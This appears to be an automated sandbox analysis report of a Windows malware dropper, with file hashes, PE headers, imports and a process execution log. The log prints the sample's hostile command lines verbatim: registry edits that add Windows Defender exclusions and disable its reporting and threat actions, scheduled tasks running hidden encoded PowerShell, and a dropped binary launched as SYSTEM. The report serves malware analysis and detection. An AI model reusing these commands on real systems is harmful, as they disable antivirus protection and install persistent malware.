            C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe

            Download File
            Process:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):7104512
            Entropy (8bit):7.680459343919421
            Encrypted:false
            SSDEEP:98304:UKZUauh5CWkkhBJtnDRLX0BE55EDpV8Y7IJyvMMdsetQfcj6P5VQ8mKUC5+oCMnK:pA59BlRDRLX0BDDp/CeKD53UC5PjUr
            MD5:893793FBD70BA4A92919D09205D6C9C1
            SHA1:CB1832F1F9652FAECE655FFBF49D82FEB98CA85A
            SHA-256:A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
            SHA-512:E4E30918B96BD5B7D0B8BC6AC189B1EBAD645B12E0AC3DE061DAA9E7003D6E746FEE1C6D9CB637A7AA19543B3339C08DBDB1E35A78628E8764A07DEDB3A73DC4
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 51%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.wC..$C..$C..$NF.$l..$NF$$...$NF%$...$...$H..$C..$P..$.. $W..$NF.$B..$...$B..$RichC..$................PE..L.....h^............................U?............@..................................:m...@.................................8d..x........?.......................I....................................k.@............`..8............................text............................... ..`.data....f........[.................@....idata..8....`........k.............@..@.rsrc....?.......@....k.............@..@.reloc...I.......J....l.............@..B................................................................................................................................................................................................................................................................................................................................

            \Device\ConDrv

            Download File
            Process:C:\Windows\System32\gpupdate.exe
            File Type:ASCII text, with CRLF, CR line terminators
            Category:dropped
            Size (bytes):129
            Entropy (8bit):4.366220328806915
            Encrypted:false
            SSDEEP:3:gBgvKCGPE3UkEmdOO2AGN8cwwHBkEmdOO2AGN8cwow:guSFMEkErONGN83YkErONGN837
            MD5:EF6D648C3DA0518B784D661B0C0B1D3D
            SHA1:C5C5F6E4AD6C3FD8BE4313E1A7C2AF2CAA3184AD
            SHA-256:18C16D43EB823C1BC78797991D6BA2898ACA8EB2DE5FD6946BE880F7C6FBBEF5
            SHA-512:E1E0443CA2E0BAFAC7CBBFD36D917D751AC6BE2F3F16D0B67B43EEBD47D6A7C36F12423AFA95B6BF56E5AAD155675C3307EFC6E94F0808EB72EF27B093EADD67
            Malicious:false
            Preview:Updating policy.........Computer Policy update has completed successfully....User Policy update has completed successfully.......

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.996908423754259
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:file.exe
            File size:7604002
            MD5:e99e15a440798e20c682eb859b3f7885
            SHA1:b6f3b87894f51669dede0afe6cb4b504fe0ae614
            SHA256:c3dd8a06d395f4772011ed42c0980a54b06915782a06873150462994ed92a712
            SHA512:6cbbae34ab571522545be0c27e1f13cf0d8545f8ba69c3d343b3ac1c1f113b7dbe6e3ce26a3897a1197bc0b57378165ab8145c29332b99d83e50b87c513e7d5e
            SSDEEP:196608:91OcMHdXjgqBmVcMymSmuw3lIk3+C83fqpI/jdyNVaZ4g:3OcuF9m51T1Iku93f8wd8Rg
            TLSH:6276333174C19CF2DE173231A28D2AE175F6EDD84D636A3717428A3A297D24AC3B1E53
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y...s...,...s...r.!.s.......s...x...s.......s.......s.^.u...s.Rich..s.........PE..L....S.L...........

            File Icon

            Icon Hash:8484d4f2b8f47434

            Static PE Info

            General

            Entrypoint:0x414b04
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            DLL Characteristics:
            Time Stamp:0x4CE553F7 [Thu Nov 18 16:27:35 2010 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:3786a4cf8bfee8b4821db03449141df4

            Entrypoint Preview

            Instruction
            push ebp
            mov ebp, esp
            push FFFFFFFFh
            push 0041B9E0h
            push 00414A2Ch
            mov eax, dword ptr fs:[00000000h]
            push eax
            mov dword ptr fs:[00000000h], esp
            sub esp, 58h
            push ebx
            push esi
            push edi
            mov dword ptr [ebp-18h], esp
            call dword ptr [0041B074h]
            xor edx, edx
            mov dl, ah
            mov dword ptr [004233D0h], edx
            mov ecx, eax
            and ecx, 000000FFh
            mov dword ptr [004233CCh], ecx
            shl ecx, 08h
            add ecx, edx
            mov dword ptr [004233C8h], ecx
            shr eax, 10h
            mov dword ptr [004233C4h], eax
            push 00000001h
            call 00007FA12CD567EBh
            pop ecx
            test eax, eax
            jne 00007FA12CD5595Ah
            push 0000001Ch
            call 00007FA12CD55A18h
            pop ecx
            call 00007FA12CD5629Dh
            test eax, eax
            jne 00007FA12CD5595Ah
            push 00000010h
            call 00007FA12CD55A07h
            pop ecx
            xor esi, esi
            mov dword ptr [ebp-04h], esi
            call 00007FA12CD5840Ch
            call dword ptr [0041B078h]
            mov dword ptr [00425A3Ch], eax
            call 00007FA12CD582CAh
            mov dword ptr [00423340h], eax
            call 00007FA12CD58073h
            call 00007FA12CD57FB5h
            call 00007FA12CD57A10h
            mov dword ptr [ebp-30h], esi
            lea eax, dword ptr [ebp-5Ch]
            push eax
            call dword ptr [0041B07Ch]
            call 00007FA12CD57F46h
            mov dword ptr [ebp-64h], eax
            test byte ptr [ebp-30h], 00000001h
            je 00007FA12CD55958h
            movzx eax, word ptr [ebp+00h]

            Rich Headers

            Programming Language:
            • [ C ] VS98 (6.0) SP6 build 8804
            • [C++] VS98 (6.0) SP6 build 8804
            • [ C ] VS2010 build 30319
            • [ASM] VS2010 build 30319
            • [EXP] VC++ 6.0 SP5 build 8804

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x1e9e40x64.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x270000xa60.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x1f8.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x199ea0x19a00False0.5822884908536585DOS executable (COM)6.608494417524647IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x1b0000x44940x4600False0.31166294642857145data4.368016436198423IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x200000x5a480x3200False0.122890625data1.370539432871311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .sxdata0x260000x40x200False0.02734375data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x270000xa600xc00False0.3388671875data3.3019646948427273IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            RT_ICON0x274a00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
            RT_ICON0x277880x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States
            RT_DIALOG0x278d80xb8dataEnglishUnited States
            RT_STRING0x279900x94dataEnglishUnited States
            RT_STRING0x27a280x34dataEnglishUnited States
            RT_GROUP_ICON0x278b00x22dataEnglishUnited States
            RT_VERSION0x271e00x2bcdataEnglishUnited States

            Imports

            DLLImport
            OLEAUT32.dllVariantClear, SysAllocString
            USER32.dllSendMessageA, SetTimer, DialogBoxParamW, DialogBoxParamA, SetWindowLongA, GetWindowLongA, SetWindowTextW, LoadIconA, LoadStringW, LoadStringA, CharUpperW, CharUpperA, DestroyWindow, EndDialog, PostMessageA, ShowWindow, MessageBoxW, GetDlgItem, KillTimer, SetWindowTextA
            SHELL32.dllShellExecuteExA
            KERNEL32.dllGetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, InterlockedIncrement, InterlockedDecrement, GetProcAddress, GetOEMCP, GetACP, GetCPInfo, IsBadCodePtr, IsBadReadPtr, GetFileType, SetHandleCount, GetEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsW, FreeEnvironmentStringsA, UnhandledExceptionFilter, HeapSize, GetCurrentProcess, TerminateProcess, IsBadWritePtr, HeapCreate, HeapDestroy, GetEnvironmentVariableA, SetUnhandledExceptionFilter, TlsAlloc, ExitProcess, GetVersion, GetCommandLineA, GetStartupInfoA, GetModuleHandleA, WaitForSingleObject, CloseHandle, CreateProcessA, SetCurrentDirectoryA, GetCommandLineW, GetVersionExA, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, GetLastError, LoadLibraryA, AreFileApisANSI, GetModuleFileNameA, GetModuleFileNameW, LocalFree, FormatMessageA, FormatMessageW, GetWindowsDirectoryA, SetFileTime, CreateFileW, SetLastError, SetFileAttributesA, RemoveDirectoryA, SetFileAttributesW, RemoveDirectoryW, CreateDirectoryA, CreateDirectoryW, DeleteFileA, DeleteFileW, lstrlenA, GetFullPathNameA, GetFullPathNameW, GetCurrentDirectoryA, GetTempPathA, GetTempFileNameA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileA, CreateFileA, GetFileSize, SetFilePointer, ReadFile, WriteFile, SetEndOfFile, GetStdHandle, WaitForMultipleObjects, Sleep, VirtualAlloc, VirtualFree, CreateEventA, SetEvent, ResetEvent, InitializeCriticalSection, RtlUnwind, RaiseException, HeapAlloc, HeapFree, HeapReAlloc, CreateThread, GetCurrentThreadId, TlsSetValue, TlsGetValue, ExitThread

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States

            Network Behavior

            No network behavior found

            Statistics

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:1
            Start time:19:03:57
            Start date:24/11/2022
            Path:C:\Users\user\Desktop\file.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\Desktop\file.exe
            Imagebase:0x400000
            File size:7604002 bytes
            MD5 hash:E99E15A440798E20C682EB859B3F7885
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            General

            Target ID:3
            Start time:19:03:59
            Start date:24/11/2022
            Path:C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe
            Wow64 process (32bit):true
            Commandline:.\Install.exe
            Imagebase:0x400000
            File size:6571809 bytes
            MD5 hash:65D01849A2062434BCE6C580CDA92A1D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            General

            Target ID:5
            Start time:19:04:01
            Start date:24/11/2022
            Path:C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe
            Wow64 process (32bit):true
            Commandline:.\Install.exe /S /site_id "525403"
            Imagebase:0x230000
            File size:7104512 bytes
            MD5 hash:893793FBD70BA4A92919D09205D6C9C1
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 51%, ReversingLabs
            Reputation:low

            General

            Target ID:10
            Start time:19:04:04
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\forfiles.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
            Imagebase:0x13e0000
            File size:41472 bytes
            MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:11
            Start time:19:04:05
            Start date:24/11/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:12
            Start time:19:04:05
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\forfiles.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
            Imagebase:0x13e0000
            File size:41472 bytes
            MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:13
            Start time:19:04:05
            Start date:24/11/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6ffff0000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:14
            Start time:19:04:05
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            Imagebase:0x11d0000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:15
            Start time:19:04:05
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:16
            Start time:19:04:05
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
            Imagebase:0x11d0000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:17
            Start time:19:04:06
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:18
            Start time:19:04:06
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:19
            Start time:19:04:06
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:20
            Start time:19:04:09
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\schtasks.exe
            Wow64 process (32bit):true
            Commandline:schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
            Imagebase:0x1160000
            File size:185856 bytes
            MD5 hash:15FF7D8324231381BAD48A052F85DF04
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:21
            Start time:19:04:09
            Start date:24/11/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:22
            Start time:19:04:09
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\schtasks.exe
            Wow64 process (32bit):true
            Commandline:schtasks /run /I /tn "gAhELFxgt"
            Imagebase:0x1160000
            File size:185856 bytes
            MD5 hash:15FF7D8324231381BAD48A052F85DF04
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:23
            Start time:19:04:10
            Start date:24/11/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:24
            Start time:19:04:10
            Start date:24/11/2022
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
            Imagebase:0x7ff7fbaf0000
            File size:447488 bytes
            MD5 hash:95000560239032BC68B4C2FDFCDEF913
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:.Net C# or VB.NET

            General

            Target ID:25
            Start time:19:04:10
            Start date:24/11/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            General

            Target ID:26
            Start time:19:04:10
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\schtasks.exe
            Wow64 process (32bit):true
            Commandline:schtasks /DELETE /F /TN "gAhELFxgt"
            Imagebase:0x1160000
            File size:185856 bytes
            MD5 hash:15FF7D8324231381BAD48A052F85DF04
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:27
            Start time:19:04:10
            Start date:24/11/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:28
            Start time:19:04:14
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\schtasks.exe
            Wow64 process (32bit):true
            Commandline:schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F
            Imagebase:0x1160000
            File size:185856 bytes
            MD5 hash:15FF7D8324231381BAD48A052F85DF04
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:29
            Start time:19:04:15
            Start date:24/11/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:30
            Start time:19:04:16
            Start date:24/11/2022
            Path:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe DC /site_id 525403 /S
            Imagebase:0x1090000
            File size:7104512 bytes
            MD5 hash:893793FBD70BA4A92919D09205D6C9C1
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 51%, ReversingLabs

            General

            Target ID:31
            Start time:19:04:17
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
            Imagebase:0xe50000
            File size:430592 bytes
            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET

            General

            Target ID:32
            Start time:19:04:18
            Start date:24/11/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:33
            Start time:19:04:25
            Start date:24/11/2022
            Path:C:\Windows\System32\gpupdate.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\gpupdate.exe" /force
            Imagebase:0x7ff70abd0000
            File size:29184 bytes
            MD5 hash:47C68FE26B0188CDD80F744F7405FF26
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            General

            Target ID:34
            Start time:19:04:26
            Start date:24/11/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            General

            Target ID:37
            Start time:19:04:27
            Start date:24/11/2022
